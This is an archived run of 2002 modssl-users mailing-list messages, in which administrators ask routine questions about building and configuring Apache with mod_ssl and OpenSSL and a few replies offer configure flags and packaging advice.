	from th06.opsion.fr id NAA04415; Mon, 11 Nov 2002 13:42:15 +0100 (MET)
Received: from 62.212.108.2 [62.212.108.2] by th06.opsion.fr id 200211111240.32c7; Mon, 11 Nov 2002 12:40:50 GMT
From: "Estrade Matthieu" 
To: 
Subject: RE : Apache 2 +SSL
Date: Mon, 11 Nov 2002 13:40:51 +0100
Message-ID: <000301c2897f$95d4fa50$0200a8c0@starchicken>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
In-Reply-To: <5.1.0.14.2.20021111043454.03155fb0@pop3.mweb.co.zw>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA04420
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Estrade Matthieu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Maybe try to add

./configure --enable-ssl --with-ssl=path-to-openssl

-----Message d'origine-----
De : owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] De la part de Christopher Chaduka
Envoyé : Monday, November 11, 2002 3:35 AM
À : modssl-users@modssl.org
Objet : Apache 2 +SSL

I searched through some archives and found out Apache 2 comes with
mod_ssl 
code included, and that to enable SSL/TLS support in Apache 2, one has
to 
compile OpenSSL first, then compile Apache 2 and
--with-ssl=/path/to/openssl
I did exactly that. Isn't the default configuration file I get supposed
to 
have some SSL directives in there? Am I brain dead? What am I missing?


--

Christopher Chaduka
Webmaster/Systems Administrator
Technical Department
M-Web Zimbabwe
Tel: +263 4 253333 Fax: +263 4 708055
Mobile: +263 11 600994
http://www.mweb.co.zw

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

__________________________________________________
Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w



__________________________________________________
Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 17:22:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA12619; Mon, 11 Nov 2002 17:21:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA12608; Mon, 11 Nov 2002 17:20:42 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CFF204CE738; Mon, 11 Nov 2002 17:20:45 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F1E432869E; Mon, 11 Nov 2002 17:19:04 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.gmx.net id PAA08926; Mon, 11 Nov 2002 15:48:15 +0100 (MET)
Received: (qmail 16951 invoked by uid 0); 11 Nov 2002 14:48:10 -0000
Received: from unknown (HELO toaster-pc) (193.170.177.38)
  by mail.gmx.net (mp019-rz3) with SMTP; 11 Nov 2002 14:48:10 -0000
Mime-Version: 1.0
Date: Mon, 11 Nov 2002 15:48:08 +0100
X-Mailer: Groupwise 6.0.1
Message-ID: <20021111T154808Z_9AE6000A0000@gmx.net>
From: Stefan Steger 
Subject: apache and mod_ssl
To: modssl-users@modssl.org
Content-Type: multipart/alternative; boundary="____BWRCVBCNGAUZYDLEUSFH____"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stefan Steger 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--____BWRCVBCNGAUZYDLEUSFH____
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

hi guys!

i have following question:

i installed an apache webserver with mod_ssl.
on this server serveral projekts are available, what i want is, that only =
one directory (projekt) is accessible via https/ssl (only https/ssl) for =
all users (also internet) and the rest of the site should ONLY be =
acccessible via http.

is that possible?

i played around with my httpd.conf, but i didn't get it.

thx

steve

--____BWRCVBCNGAUZYDLEUSFH____
Content-Type: multipart/related; boundary="____JUFJXSVMPYLVHRXTPSTH____"


--____JUFJXSVMPYLVHRXTPSTH____
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable







hi guys!


 


i have following question:


 


i installed an apache webserver with mod_ssl.

on this server serveral projekts are available, what i =
want=20
is, that only one directory (projekt) is accessible via https/ssl=
=20
(only https/ssl) for all users (also internet) and the rest of the site =
should=20
ONLY be acccessible via http.


 


is that possible?


 


i played around with my httpd.conf, but i didn't =
get=20
it.


 


thx


 


steve


 


 


--____JUFJXSVMPYLVHRXTPSTH____--

--____BWRCVBCNGAUZYDLEUSFH____--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 12 11:15:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA12686; Tue, 12 Nov 2002 11:14:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA12668; Tue, 12 Nov 2002 11:13:08 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1CE854CE74E; Tue, 12 Nov 2002 11:13:12 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9C5B82869F; Tue, 12 Nov 2002 09:53:27 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www2.sfxc.edu.hk id HAA05983; Tue, 12 Nov 2002 07:07:15 +0100 (MET)
Received: (qmail 9513 invoked from network); 12 Nov 2002 14:08:56 -0800
Received: from unknown (HELO MMLCDTEA) (bryan@10.123.48.221)
	by ipvpn059171.netvigator.com (qmail 1.03 + ejcp) with RC4-MD5 encrypted SMTP;
	12 Nov 2002 14:08:56 -0800
Message-ID: <000a01c28a11$b0dc9b40$dd307b0a@mmlc.sfxc.edu.hk>
From: "Bryan Ko" 
To: 
Subject: Confusion with mm library configuration!
Date: Tue, 12 Nov 2002 14:06:47 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C28A54.BD682440"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bryan Ko" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C28A54.BD682440
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: quoted-printable

Hello all,

I am trying to install the mod_ssl and the mm library and below is my =
goal:
1. Install Apache 1st without mod_ssl.
2. Enable mm library.
3. Install mod_ssl as a shared object.

I have installed mm libraray. The next step I may do is:
cd /path/mod_ssl_xxx
./configure --apache=3D../apache_xxx --with-eapi-only
cd /path/apache_xxx
EAPI_MM=3DSYSTEM
./configure --enable-rule=3DEAPI \
... some more configuration
make && make install

My question is do I have to specify "--with-mm" again when I make=20
mod_ssl, do I have to specify "--with-mm" again when making other=20
modules like mod_php??? Is the mm support need to build both in=20
apache itself and its modules???

Thanks in advance... and please forgive my poor English =3D)

Regards,
Bryan
------=_NextPart_000_0007_01C28A54.BD682440
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: quoted-printable









Hello all,


 


I am trying to install the mod_ssl and =
the mm=20
library and below is my goal:


1. Install Apache 1st without =
mod_ssl.


2. Enable mm library.


3. Install mod_ssl as a shared =
object.


 


I have installed mm libraray. The next =
step I may=20
do is:


cd /path/mod_ssl_xxx


./configure --apache=3D../apache_xxx=20
--with-eapi-only


cd /path/apache_xxx


EAPI_MM=3DSYSTEM


./configure --enable-rule=3DEAPI =
\


... some more =
configuration


make && make =
install


 


My question is do I have to specify =
"--with-mm"=20
again when I make 


mod_ssl, do I have to specify =
"--with-mm" again=20
when making other 


modules like mod_php??? Is the mm =
support need to=20
build both in 


apache itself and its =
modules???


 


Thanks in advance... and please forgive =
my poor=20
English =3D)


 


Regards,


Bryan


------=_NextPart_000_0007_01C28A54.BD682440--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 12 18:30:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28661; Tue, 12 Nov 2002 18:29:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id SAA28657; Tue, 12 Nov 2002 18:28:57 +0100 (MET)
Received: (qmail 7305 invoked from network); 12 Nov 2002 17:28:55 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 12 Nov 2002 17:28:55 -0000
Message-ID: <01ee01c28a70$8e4b6070$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
Subject: OpenSSL RPMs and Apache/modssl install
Date: Tue, 12 Nov 2002 10:25:54 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a Red Hat 7.3 system and ran up2date to get all the latest packages.
Now I want to install Apache/modssl/modperl etc. which I am accustomed to
building from source, starting with the OpenSSL libraries.

I see that an OpenSSL RPM has already been installed with 7.3, but it does
not appear to be the latest version (unless RedHat has a different numbering
system). Specifically it says openssl-0.9.6b-28.rpm is installed, whereas I
want to have openssl-0.9.6g.tar.gz. I don't see any updated rpms on RedHat.
Am I going to run into any trouble if I build OpenSSL from source and
overwrite (or duplicate) the RPM? There are other packages that depend on
the RPM. Thanks.

Thanks
Emily Witcher - emily@crytech.com
Developer and System Administrator
Crytech - 406-655-0501/1-888-CRYTECH


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 12 18:33:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28814; Tue, 12 Nov 2002 18:32:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id SAA28808; Tue, 12 Nov 2002 18:32:00 +0100 (MET)
Received: (qmail 7775 invoked from network); 12 Nov 2002 17:31:58 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 12 Nov 2002 17:31:58 -0000
Message-ID: <020201c28a70$fb394580$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
References: <01ee01c28a70$8e4b6070$1801a8c0@croaker>
Subject: Re: OpenSSL RPMs and Apache/modssl install
Date: Tue, 12 Nov 2002 10:28:57 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You know, I think I found my own answer. Sorry! ;)

http://www.openssl.org/support/faq.cgi#BUILD8

Emily Witcher - emily@crytech.com
Developer and System Administrator
Crytech - 406-655-0501/1-888-CRYTECH
----- Original Message -----
From: "Emily Eileen Witcher" 
To: 
Sent: Tuesday, November 12, 2002 10:25 AM
Subject: OpenSSL RPMs and Apache/modssl install


> I have a Red Hat 7.3 system and ran up2date to get all the latest
packages.
> Now I want to install Apache/modssl/modperl etc. which I am accustomed to
> building from source, starting with the OpenSSL libraries.
>
> I see that an OpenSSL RPM has already been installed with 7.3, but it does
> not appear to be the latest version (unless RedHat has a different
numbering
> system). Specifically it says openssl-0.9.6b-28.rpm is installed, whereas
I
> want to have openssl-0.9.6g.tar.gz. I don't see any updated rpms on
RedHat.
> Am I going to run into any trouble if I build OpenSSL from source and
> overwrite (or duplicate) the RPM? There are other packages that depend on
> the RPM. Thanks.
>
> Thanks
> Emily Witcher - emily@crytech.com
> Developer and System Administrator
> Crytech - 406-655-0501/1-888-CRYTECH
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 05:16:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA20160; Wed, 13 Nov 2002 05:15:19 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from ALPHA8.CC.MONASH.EDU.AU id FAA20079; Wed, 13 Nov 2002 05:14:48 +0100 (MET)
Received: from splat.its.monash.edu.au ([130.194.1.73])
 by vaxh.cc.monash.edu.au (PMDF V5.2-31 #39306)
 with ESMTP id <01KOTNSTPA2I94F76F@vaxh.cc.monash.edu.au>; Wed,
 13 Nov 2002 15:10:44 +1100
Received: from splat.its.monash.edu.au (localhost [127.0.0.1])
	by localhost (Postfix) with ESMTP	id 41AF0130128; Wed,
 13 Nov 2002 15:09:42 +1100 (EST)
Received: from its.monash.edu.au (carboncopy.its.monash.edu.au [130.194.2.239])
	by splat.its.monash.edu.au (Postfix) with ESMTP	id C089C1302AB; Wed,
 13 Nov 2002 15:06:21 +1100 (EST)
Date: Wed, 13 Nov 2002 15:06:19 +1100
From: Leslie Liew 
Subject: modssl web site and bug submission
X-Sender: "Leslie Liew" 
To: modssl-users@modssl.org
Message-id: <3DD1C1AB.E7CEEF9@its.monash.edu.au>
Organization: Monash University
MIME-version: 1.0
X-Mailer: Mozilla 4.79 [en]C-CCK-MCD monwin/025  (Win98; U)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
X-Accept-Language: en
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leslie Liew 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I was wondering who was maintainig the www.modssl.org site and how to
contact them regarding the broken bug submission link?

And since the link has been broken for a while, what is the procedure of
reporting a bug?

--
Leslie Liew
Directory Assistant, Infrastructure Services
Information Technology Services, Monash University - Clayton
Phone: +61 3 990 54542
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 07:01:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA22203; Wed, 13 Nov 2002 07:00:37 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id GAA22063; Wed, 13 Nov 2002 06:59:25 +0100 (MET)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c38line22.dialup.ctm.net [202.175.53.23])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id NAA28441;
	Wed, 13 Nov 2002 13:38:43 +0800
Message-ID: <3DD1E9F8.E1CFAF7@ita.org.mo>
Date: Wed, 13 Nov 2002 13:58:17 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: mod_ssl , Apache ,
        OpenSSL 
Subject: Problem of sign.sh ( Create CA for WebServer )
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

My System is Redhat 7.2, Apache 1.3.22 and openssl 0.9.6b...
After I get the sign.sh from here :
http://www.modssl.org/source/cvs/exp/mod_ssl/pkg.mod_ssl/pkg.contrib/sign.sh

then run the command : sign.sh ssl.csr/server.csr ( location path is
/etc/httpd/conf, sign.sh into /usr/bin )

the error message :

[root@itahost2 conf]# sign.sh ssl.csr/server.csr
CA signing: ssl.csr/server.csr -> ssl.crt/server.csr:
Using configuration from ca.config
./ca.key: No such file or directory
trying to load CA private key
28968:error:02001002:system library:fopen:No such file or
directory:bss_file.c:245:fopen('./ca.key','r')
28968:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:247:
CA verifying: ssl.crt/server.csr <-> CA cert
Error loading file ca.crt
28969:error:02001002:system library:fopen:No such file or
directory:bss_file.c:104:fopen('ca.crt','r')
28969:error:2006D002:BIO routines:BIO_new_file:system
lib:bss_file.c:106:
28969:error:0B084002:x509 certificate
routines:X509_load_cert_crl_file:system lib:by_file.c:278:
usage: verify [-verbose] [-CApath path] [-CAfile file] [-purpose
purpose] [-engine e] cert1 cert2 ...
recognized usages:
        sslclient       SSL client
        sslserver       SSL server
        nssslserver     Netscape SSL server
        smimesign       S/MIME signing
        smimeencrypt    S/MIME encryption
        crlsign         CRL signing
        any             Any Purpose

So, can you help me to fix this problem ?

Thank a lots.

Edward.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 13:24:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA05326; Wed, 13 Nov 2002 13:23:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id NAA05322; Wed, 13 Nov 2002 13:22:17 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gADCLEq06971
	for ; Wed, 13 Nov 2002 12:21:34 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 13 Nov 2002 12:21:09 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F232A@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: OpenSSL RPMs and Apache/modssl install
Date: Wed, 13 Nov 2002 12:21:07 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes, you will run into problems if you overwrite the existing openssl files.
For example, both ssh and sendmail will be broken. (Please don't anyone
start a religious war over sendmail).

I have been assured by Red Hat's own staff that although the numbering is
off, it includes all the security updates to the present day which are
usually "backported". Red Hat have a policy of backporting as they keep new
features for new releases so that these can be tested independently. (Again,
no religious wars over package versions please).

Only if there are features not compiled in that you wish to use is it worth
recompiling, and in that case you can use /usr/local/ssl or /usr/local to
build it in (ie, don't overwrite the /usr/bin/openssl file). Although as you
are in the US then you are restricted by a number of US patents anyway. See
the openssl FAQ for more information.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.


> -----Original Message-----
> From: Emily Eileen Witcher [mailto:emily@crytech.com]
> Sent: 12 November 2002 17:26
> To: modssl-users@modssl.org
> Subject: OpenSSL RPMs and Apache/modssl install
> 
> 
> I have a Red Hat 7.3 system and ran up2date to get all the 
> latest packages.
> Now I want to install Apache/modssl/modperl etc. which I am 
> accustomed to
> building from source, starting with the OpenSSL libraries.
> 
> I see that an OpenSSL RPM has already been installed with 
> 7.3, but it does
> not appear to be the latest version (unless RedHat has a 
> different numbering
> system). Specifically it says openssl-0.9.6b-28.rpm is 
> installed, whereas I
> want to have openssl-0.9.6g.tar.gz. I don't see any updated 
> rpms on RedHat.
> Am I going to run into any trouble if I build OpenSSL from source and
> overwrite (or duplicate) the RPM? There are other packages 
> that depend on
> the RPM. Thanks.
> 
> Thanks
> Emily Witcher - emily@crytech.com
> Developer and System Administrator
> Crytech - 406-655-0501/1-888-CRYTECH
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 16:30:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15848; Wed, 13 Nov 2002 16:29:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA15787; Wed, 13 Nov 2002 16:28:10 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6659E4CE753; Wed, 13 Nov 2002 16:28:13 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9B66A286B8; Wed, 13 Nov 2002 15:24:12 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.tiscali.it id SAA29026; Tue, 12 Nov 2002 18:41:05 +0100 (MET)
From: ennio.salemi@tiscali.it
Received: from [193.55.113.196] by mail.tiscali.it with HTTP; Tue, 12 Nov 2002 18:41:03 +0100
Date: Tue, 12 Nov 2002 18:41:03 +0100
Message-ID: <3DD0C85200001627@mail-5.tiscalinet.it>
Subject: HELP: Require a certificate 
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA29035
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ennio.salemi@tiscali.it
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all...
I'd like to know where in the source code of mod_ssl is performed the request
of the client certificate (when it's required to verify the client).
Thank you
Ennio 

__________________________________________________________________
Tiscali ADSL. Scopri la fantastica promozione di Natale: tutto Gratis fino
al 9 gennaio!
Abbonati ora: prima ti abboni, più risparmi!
http://point.tiscali.it/adsl/index.shtml


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 16:30:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15863; Wed, 13 Nov 2002 16:29:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA15800; Wed, 13 Nov 2002 16:28:13 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C02534CE773; Wed, 13 Nov 2002 16:28:13 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 438DC287B1; Wed, 13 Nov 2002 16:22:16 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hem.ati.es id LAA01489; Wed, 13 Nov 2002 11:31:40 +0100 (MET)
From: mb3@ati.es
Received: from localhost (localhost.localdomain [127.0.0.1])
	by hem.ati.es (Postfix) with ESMTP id EFACC4F38A
	for ; Wed, 13 Nov 2002 11:31:23 +0100 (CET)
Received: by hem.ati.es (Postfix, from userid 507)
	id 3B5834F382; Wed, 13 Nov 2002 11:31:23 +0100 (CET)
To: modssl-users@modssl.org
Subject: Please, I need aid
Message-ID: <1037183483.3dd229fb2c817@intranet.ati.es>
Date: Wed, 13 Nov 2002 11:31:23 +0100 (CET)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: IMP/PHP IMAP webmail program 2.2.7
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mb3@ati.es
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I'm an Spanish technicien, and my name is Marc Bartres.
Please excuse for my english first.

I've a problem installing Apache 2.0.43 ans SSL.
I've downloading this version and the OpenSSL 0.9g version.

The Apache without SSL runs ok.
But when I runs Apache with startssl appears an error of a library: vhost.c of 
APR.

I compiled Apache with:
./configure --prefix=/usr/local/apache2 --enable-ssl
make
make install
and I configured httpd.conf with ServerName "the_IP:80" and ssl.conf with 
ServerName "the_IP:443".

I put server.key and server.crt in ssl.conf too.

I want a basic secure server and I don't know what's the problem.

I'm testing enabling all modules, but then appears and error on DAV's library.

Please, it's for my work and I'm only in this project. Nobody knows Apache.


Thany you very much.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 16:30:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15866; Wed, 13 Nov 2002 16:29:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA15801; Wed, 13 Nov 2002 16:28:14 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D15FB4CE776; Wed, 13 Nov 2002 16:28:13 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 32EC2287B5; Wed, 13 Nov 2002 16:22:28 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from galileo.fis.unipr.it id MAA04222; Wed, 13 Nov 2002 12:49:43 +0100 (MET)
Received: from galileo.fis.unipr.it (galileo.fis.unipr.it [192.135.11.1])
	by galileo.fis.unipr.it (8.11.6/8.11.6) with ESMTP id gADBng912406;
	Wed, 13 Nov 2002 12:49:42 +0100
Date: Wed, 13 Nov 2002 12:49:42 +0100 (CET)
From: Fabio Spataro 
X-X-Sender:  
To: 
Cc: 
Subject: unsupported certificate purpose
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fabio Spataro 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,
I'm setting up an https server with apache+mod_ssl+php. Since I have to
check the client certificate at php level I put this line in httpd.conf:

SSLVerifyClient require

The client certificate has been created with this extension:

nsCertType = server

At the client side I'm testing the application with this command:

wget --sslcertfile= --sslcertkey= 

This is the error I get:

Unable to establish SSL connection.

This is the apache error_log I get:

[error] mod_ssl: Certificate Verification: Error (26): unsupported
certificate purpose

I can solve the problem putting these lines in 
mod_ssl-2.8.5-1.3.22/pkg.sslmod/ssl_engine_init.c

    /*
     *  Configure CTX purpose
     */
    SSL_CTX_set_purpose(ctx, X509_PURPOSE_ANY);

just before

    /*
     * Configure Client Authentication details
     */

and rebuilding mod_ssl. 

Is there a cleaner way to configure the required client certificate purpose?


Fabio Spataro
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 17:35:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20071; Wed, 13 Nov 2002 17:34:38 +0100 (MET)
